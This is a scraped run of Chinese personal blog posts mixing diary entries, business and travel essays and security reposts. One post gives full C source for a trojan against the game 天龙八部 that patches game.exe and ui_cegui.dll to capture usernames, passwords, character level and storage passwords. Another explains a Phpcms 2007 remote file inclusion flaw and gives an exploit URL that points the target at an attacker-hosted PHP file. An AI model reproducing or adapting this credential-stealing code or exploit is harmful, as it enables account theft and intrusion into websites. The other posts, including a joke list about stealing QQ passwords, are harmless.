也学习,也迷茫

电脑里存了那么多东西,但每次看的时候都只想看电脑方面的,其他的一时间总提不起兴趣。

先放纵一下自己吧,也不是坏事。

      但最近工作上有些事情不太顺利,还是因为自己对外贸有些工作流程上没有深度认识。前几天网上转悠的时候看到某前辈发的帖子,高谈阔论,旁征博引,看的我一路仰视过去。原来想把外贸这门学问做好,要学习的东西太多了,从宏观到微观,从做人到做事,都要处处留心,还包括我最头疼的财务知识。

     这一段兵团不断的改革,而在高层的行动又缺乏协调、一致,结果下面的斑竹疏于版面管理,出勤率更低了。晚上整理了一张表明天要整理整理人事了,管理不能只靠胡萝卜,有时同样要靠大棒。

     前几天坚持每天更新这个论坛的内容,从而可以搜索引擎更快、更多的收录。在google上已经收录了54篇,再到百度上一看,只有首页。一想不对,以前从来都是百度收录的比google多,这一次怎么可能是比google少呢?就做了一个robots.txt供它的机器人抓取,再到浏览器上一看,怪了,内容居然跟我在本地编辑好的内容不一致。我又在FTP中查看了远程服务器下文件内容,还是跟我本地的一样。然后我就把文件从远程服务器上删掉了,再到浏览器中一看,傻眼了,居然还能正常显示,但内容是什么呢?

  

复制内容到剪贴板程序代码程序代码
  Useragent:*

    Disallow:/

    

    我的神,这不就等于说在百度面前把握论坛里所有东西都设了路障吗?去问空间的KF,得到的答案是因为是免费空间,就有这样的限制,如果想恢复机器人文件权限、内容,需要升级到收费空间。 Shit,真不知它是怎么做到的。连这个小小的文件都做限制,彻底崩溃了。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/517

天龙八部木马核心源代码

信息来源:邪恶八进制信息安全团队
文章作者:认真的雪

发一个网游木马核心代码…无聊的时候写的..
截取了用户名,密码,等级,仓库密码

复制内容到剪贴板程序代码程序代码
#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

DWORD ui_cegui;

void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;

char user[40];
char pass[40];
char storePassWord[40];
DWORD dwGrade;

DWORD stroePath=0;
void _stdcall StroeUnhook();

void _stdcall HookStroe();
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}

DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);

for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{

*lpRet=(void*)buff;
return i+(DWORD)hModule;

}

}

return 0;

}

DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;

HMODULE hModule=::GetModuleHandle(moduleName);

if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{

*lpRet=(void*)buff;
return i+(DWORD)hModule;

}

}
return 0;

}

void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);

return;

}

__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}

void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;

}

__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}

void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;

}

void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);

::MessageBox(NULL,data,"ok",0);

}
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];

}
}

void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);

MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;

}
void HookGrade()
{

DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);

}

void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();

return 0;
}

BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{

switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
DWORD ThreadId;
CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
break;
}

default:break;
}

return TRUE;
}

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/518

Phpcms 2007 远程文件包含漏洞

该cms的核心配置文件/include/common.inc.php有缺陷
——————————————–
//23行开始
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
————————————————
这里extract函数会导致变量覆盖,可能引发一系列的问题

我们看/yp/admin.php,这个文件名字是挺吓人的,还带admin。但是注册个企业用户就可以访问该页面了,我们看部分代码
————————————————
//从头开始看
$rootdir = str_replace("\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php';//通过extract可以覆盖$rootdir为任意值
require PHPCMS_ROOT.'/languages/'.$CONFIG['adminlanguage'].'/yp_admin.lang.php';
if(!$_username) showmessage($LANG['please_login'],$PHPCMS['siteurl'].'member/login.php?forward='.$PHP_URL);
require $rootdir.'/web/admin/include/common.inc.php ';//触发远程文件包含
————————————————

利用的方式可以先在你的网站 site.com上放置/web/admin/include/common.inc.php这样的目录和文件,当然common.inc.php就是你的恶意代码,然后注册个用户访问网站并提交
http://target.com/yp/admin.php? Rootdir=http://site.com/即可。

最 后多说一句,php5默认不开启远程文件功能,如果想包含本地文件又要被gpc限制,所以看上去这个漏洞挺鸡肋的。不过qiuren同学提供了一个不错的 方法,可以旁注一个shell写/web/admin/include/common.inc.php到/temp目录然后包含之

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/519

最有趣的病毒

杀毒软件公司Panda Security最近列出了过去的六个月中出现的最意思的病毒.其中就有最恐怖病毒、最爱干净病毒和最具资讯功能病毒.
最恐怖病毒-MalwareProtector2008和AdvancedXpFixer会一点点得“吃掉”被感染电脑的桌面.实际上,这两个病毒是由一个杀毒软件公司制造的.该公司希望通过这种方式让用户使用他们的产品.
最爱干净病毒-Tixcet.A会删除用户硬盘上的所有文件.

绑架者病毒-PGPCoder.E和“ransomware”.该病毒会对用户电脑硬盘上的数据进行加密,然后向用户索要金钱.用户只有花钱才能得到解密密码.

最浪漫病毒-Nuwar.OL,Nuwar.QI和Valentin.E用浪漫的内容来勾引用户点击激活它从而感染电脑.

最具资讯功能病毒-尽管该病毒名为Romeo.C,它却能让你获取丰富的资讯信息.Rome.C不仅窜改windows注册表,还会在发作时弹出新闻窗口.

骗子病毒- Manclick.A, Manclick.B 和Manclick.C会像别的病毒一样,让用户觉得他们是安装了一个合法的软件,而非恶意软件.它们还会将用户引向钩鱼网站,收集用户隐私用于网上诈骗.

最具欺骗性病毒-蠕虫病毒FakeDeath通过散布消息称古巴总统菲德尔·卡斯特罗已死亡来吸引用户点击而感染电脑.

《启示录》布道者病毒-RenameLoi.A有电脑上运行时会发出烦人的噪音并弹出有关反基督教和审判日的窗口.

酷酷猪病毒-当用户运行含有MSNWorm.EI蠕虫病毒代码的文件时,电脑上就弹出一张化了妆带着项链和太阳眼镜的猪的图片.

最吵病毒-中了BeepBeep.A病毒后,用户进入Windows或打开系统文件时电脑会发出一串烦人的噪声.

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/pc-tech/520

本人教你如何盗QQ号

绝对可行! 

  一、观察法:

  初级:站在别人的身后看着他输入密码。成功率73%

  高级:卖通网吧管理员,在网吧装上摄象机。成功率100%

  二、收买法:

  初级:随便抓一个上网的人,掏出一万人民币,叫他说出亲朋好友的一个QQ密码。成功率71%

  高级:收购腾讯公司,要什么号码有什么号码。成功率100%。

  三、威逼法

  初级:拿把菜刀、砍刀之类架在上网人的脖子上逼他说出密码。成功率100%

  高级:叫来自己的部下道:“俺看见你上班上网,说出密码。”成功率100%

  四、诱惑法:

  初级:准备毛巾、纸巾若干,在网吧做痛苦欲绝状,并做好持久、连续做战准备。成功率31%

  高级:找一个看得顺眼的上网人,发展成为丈夫、妻子、情人之类的角色,怕他(她)不把密码双手奉上?成功率100%。

  五、瞎蒙法:

  初级:闭上眼睛,乱敲键盘,看自己的运气。成功率0.67%.

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/521

一支雪茄买下德国企业

在德国,几乎每两天诞生一家中国公司。目前,已有七百余家中国全业落户德国。  

    500万元换教训

    上世纪 90年代中期,蒋洲从国内一所大学毕业。他的父亲是上海的民营企业家。  

    不久,蒋洲成立了一家名为“华鹏的贸易”公司。  

    此时,商机开始出现,德国家庭使用饮料机,内部有一个制造二氧化碳的小钢瓶,需求量非常大。蒋洲发现上海企业有能力生产。权瓶,且造价低廉。他积极参与竞标,因为报价很低,他顺利地接到一笔价值 100万马克的订单。折合500万元人民币。第一笔买卖就赢得如此大的订单,蒋洲有点飘飘然。

    钢瓶运到德国,客户要求退货,因为钢瓶经过海上运输,发生一定的生绣现象。如果是东南亚客户,压压价,就可以卖了。德国人坚决不要。这批货只好运回上海。

    钱没赚到,反而背上沉重的债务。认真思考父亲的教诲:“这次失败.在于缺乏对德国市场的全面了解。再者就是对产品生产与运输难度了解不足,犯的都是低级错误”  

    为解决钢瓶在运输途中受潮问题。蒋洲请了两名德国技术专家,到上海钢瓶工厂进行技术攻关,产品质量迅速提高,加上价格优势后.蒋洲在德国钢瓶压力容器行业里.越来越受关注,他从上海发到的德国的钢瓶,被广泛用于当地工商业中。  

    一支雪茄买工厂

    生意做大了,各类钢瓶订单纷至沓来。产品从上海运至汉堡,周期较长,往往满足不了顾客的需求。有了一定积累的蒋洲,决定在德国设立中国的工厂。

    柏林以西80公里的勃兰登堡洲,有一个2.7万人的拉特诺小镇,有一家德国著名钢瓶制造企业——威尔茨压力钢瓶厂,曾是东德的国有企业,工人素质高,设备先进。2003年初,威尔茨公司因投资失误,无力还贷,申请破产。  

    蒋洲清楚地意识到,威尔茨将是自己登陆欧洲的桥头堡。盯上威尔茨这块“肥肉”的,还有美、日、德的同行。  

    根据当地法律规定,企业破产后,由有关机构指派破产管理人处理遗留问题。因此,取得破产管理人詹姆斯先生的信任十分重要。  

    电气高级工程师出身的詹姆斯,不仅精通业务,而且擅长商业谈判。此人外表温文尔雅,待人彬彬有札,却是公私分明,一丝不苟。  

    当时,美、日、德的商家代表,根本不把乳臭未干的蒋洲放在眼里。收购商务会一开始,美方代表仗着财大气粗,态度侮傲;德方代表凭着天时地利势气逼人;日方代表步步为营,稳扎稳打。但是,脸带微笑、态度谦逊的蒋洲,引起詹姆斯的注意。

    蒋洲认为,成功并购威尔茨,需要有五大要素。一是知根知底,购并双方应该相互熟悉;二是要“善意收购”,德国法律制度比较完善,工会力量非常强大,政府对于就业等问题非常关注;三是扬长避短,充分发挥购并双方的优势,相互融合共生共赢;四是收购方案明确,详细清楚;五是管理到位,一定要有熟悉当地情况的人员管理,对德国失业人员的就业,应实施“小步走,不停步”策略。无论从哪方面说,中方都有能力、有条件收购威尔茨。  

    想到这里,蒋洲掏出一支雪茄,把密封的雪茄头慢慢剪开一个口,他并不急于抽烟,而是将雪茄放在鼻子下,轻轻嗅了一下。詹姆斯一眼看出,这是一支价值50美元的古巴高级雪茄。蒋洲使用的雪茄剪,则是价值两万多美元的雪茄套具中的一件。詹姆斯暗吃一惊,为中国年轻人显现出的成熟和稳重而惊异。  

    

  谈判休息时间,詹姆斯主动走到蒋洲的面前,说:“给我一支雪茄,除此之外,我别无他求。”  

    “如果我没记错,这是拜伦写的一首雪茄赞美诗。”    詹姆斯瞪大眼睛,说:“蒋先生真是博学多才,佩服”  

    经过三轮谈判,詹姆斯决定由蒋洲以 200万欧元的价格收购威尔茨。  

    在合同签订仪式的酒会上,詹姆斯对蒋洲说:“小伙子,好好经营你的德国企业吧,你是用一支雪茄,从我手中买走威尔茨的。希望不久你能用在威尔茨赚到的钱,再次请我抽上等的雪茄。”  

    融入对方天地宽  
  
    德国企业是以优质制造著称的,有着八十多年建厂历史的威尔茨,流水线也是全自动的,速度快,精度高,比国内以手工为主的生产工艺先进多了。  

    德国工人工资高,同样生产钢瓶的厂家,德国工人平均月薪两千多欧元,中国工人月薪一干元人民币左右。从生产效率看,德国企业生产一个钢瓶,只要几十秒钟;中国企业则手工制作,至少要花三倍以上时间,德国人工成本高的劣势,被高效率生产的优势抵消。德国本土化生产贴近欧美市场,可以降低运输成本,德国高质量的产品,可以省去不少返修成本,综合成本占优,这是立足于德国的关键。    

    只要企业名称不变、产品质量不变,客户一般不会轻易改变这种关系。威尔茨易主后,蒋洲的主要工作是拜访客户,增进沟通和了解。威尔茨大大小小的客户有一百五十多家,60%一70o%来自德国,还有欧美其他国家的,其中的大客户就有二十多家。      
    蒋洲实施这套“中国收购、德国制造”经营模式,不仅融入企业的生产中,也体现在管理制度上。    
  
    作为总经理的蒋洲,深有体会地说:“到德国发展,要用信得过的当地人才。德国农工商税务等方面都有严格的程序和规定,繁文褥节特别多,要是单靠中国人,肯定无所适从。”“中国收购、德国制造”这条路子,使古老的威尔茨焕发勃勃生机。  

    如今,工厂门口主着三根旗杆,分别是中国国旗、德国国旗和勃兰登堡州旗,三面旗帜就是三层含义:厂方的主人是中国人,产品的制造在德国,货物的产地在勃兰登堡州。  

    但是,创业的路子并非一帆风顺,收购刚刚完成,开始恢复生产,投诉来了,工厂噪音过大,影响附近河流里鱼群和森林宿鸟的生活。  

    在极为泣重生态环境的德国,这是一件大事,最终,企业只得让步,缩短生产时间,停开部分机器。企业每小时产量的销售额为2000欧元,少开1小时,意味着损失200O欧元。  

    一波未平,一波又起。一名德国工人多次违犯劳动纪律,应予解雇。德国的劳动保护法非常严格,老板解雇工人,很不容易,蒋洲花了9个月时间,好不

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/success-way/522

韩国人另眼看奥运

新千年的首届奥运会,我是在汉城看的。我和十二亿中国人一样,每天牵挂着自家的金牌数。但除此之外我还有一个收获,就是集中体会了韩国的国民性。

    首先说电视里的韩国运动员,有两大特点:一是牛,二是哭。这个牛,从入场式就可看出来,器宇轩昂,示人以强。比赛时,脸一律绷着,看对手如老虎看小羊。如果赢了,一定要手舞他们的太极旗疯狂奔跑,让全世界都知道“俺是韩国人,俺们韩国人赢了!”战胜对手时,满面轻蔑的表情,虽然按照礼貌跟对方握手,但眼睛却看着别处,仿佛公主赏给乞丐零钱。我在他们的脸上似乎读出了许多成语:睥睨群雄、不可一世、眼空四海、气冲斗牛……总之一个字:牛!只有那位获得射击冠军的小姑娘,恬静平和,不卑不亢,用中国的美学看来,像个世界冠军的样。

    哭是奥运会这样的大戏中常见的画面,但韩国人格外擅长。他们是胜也哭,败也哭,场上哭,场下哭,抱着教练哭,望着国旗哭,健儿在悉尼哭,父母在汉城哭,男人哭得“泪飞顿作倾盆雨”,女人哭得“梨花一枝春带雨”……“然则何时而乐耶?”吾未之尝见也。这个哭有时是很感人的,因为韩国人的确不容易。他们的人口不到全球的百分之一,国土只有9万多平方公里,半岛南北加起来也只有中国的一个中等省大,但是他们却拿到了差不多百分之三的金牌。而且这些金牌大多不是必然的囊中之物,而是拼命拼来的。想想拥有十亿人口幅员辽阔的泱泱大国印度只获得一枚铜牌,韩国人能不“感极而悲者矣”?

    中国金牌数虽列第三,但你人口占世界五分之一还多,你的金牌有五分之一吗?所以若按照比例计算,韩国的体育成绩是超过中国的。

    当然哭得太多也显出韩民族脆弱的一面,显得风度不够,心灵很容易被外物左右,没有大家气魄。但韩国本来就是小国,用不着像中美英法俄那样深沉。所谓“不以物喜,不以己悲”的境界,大多数中国人也是做不到的。所以,哭就哭吧。

    其次说后方的观众和转播。我的一个感觉是,韩国人只关心有韩国人参加的比赛,美国的也关注一些,其他的就可有可无了。所以在汉城看电视不容易迅速了解奥运会的全貌,我必须每天上网去补充信息。每有韩国人获胜的比赛,电视台必反复播放,频率远远超过中国。有一场柔道比赛,南边选手把北边选手压倒在地,电视里采用蒙太奇手法几十次、几十次地重复这一瞬间,我作为外国人都觉得有点不舒服。电视台是如此地“爱国”,观众更是万众一心。我有两昼夜是和一群韩国人以及几个西方人一起看电视的。韩国的年轻朋友在荧屏前,肌肉绷着,拳头攥着,韩国每得一分,他们女的尖叫,男的狂吼,把我也感染了跟他们一起喊起来,几个西方人则笑得直摇头。

    当电视里播放中韩之间的比赛,比如乒乓球羽毛球之类时,韩国人知道不是中国的对手,便纷纷借故离座。他们不能忍受在我的面前目睹同胞被宰。他们每得知中国又获得了金牌,便对我有所疏远,不像我这般可以超然地欣赏一切比赛。我曾经以为中国人是最爱国的,但现在发现比韩国人要差十倍。

    每个韩国人都能够自觉地维护他们的民族利益和尊严,尽管有时做得过分,起了相反的效果,但对于这样一个半岛民族来说,还是利大于弊的。韩国的民族主义情绪是狂热的,但好像只让人感到一点不快和好笑,还不会造成太大的世界危害。假如一个泱泱大国也这样以邻为壑,惟我独尊,那世界局势就颇为不妙了。

    所以,中国人虽然经常屈己从人,经常说外国的月亮比中国的圆,还是比斤斤计较、讳疾忌医式的爱国主义要好。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/other/523